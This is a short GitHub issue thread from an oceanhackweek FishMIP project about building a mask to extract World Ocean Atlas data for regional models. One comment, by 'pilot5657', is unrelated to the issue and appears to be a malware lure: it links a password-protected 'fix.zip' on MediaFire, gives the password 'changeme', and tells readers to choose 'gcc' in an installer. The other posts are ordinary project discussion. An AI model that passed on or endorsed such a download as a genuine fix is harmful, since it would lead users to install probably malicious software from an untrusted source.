### ISSUE TITLE
Create a mask to extract WOA data

### ISSUE THREAD

**Issue by lidefi87** [oceanhackweek/ohw24_fishmip_shiny_au#2]
We will need to extract data for each FishMIP regional model contained in this shapefile: `/scratch/nf33/la6889/fishmip/FishMIP_regional_models`

We can create a mask using this notebook: https://github.com/Fish-MIP/FishMIP_regions/blob/main/Scripts/03b_Regional_Models_3DMasks.md

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lidefi87** [comment]
Completed
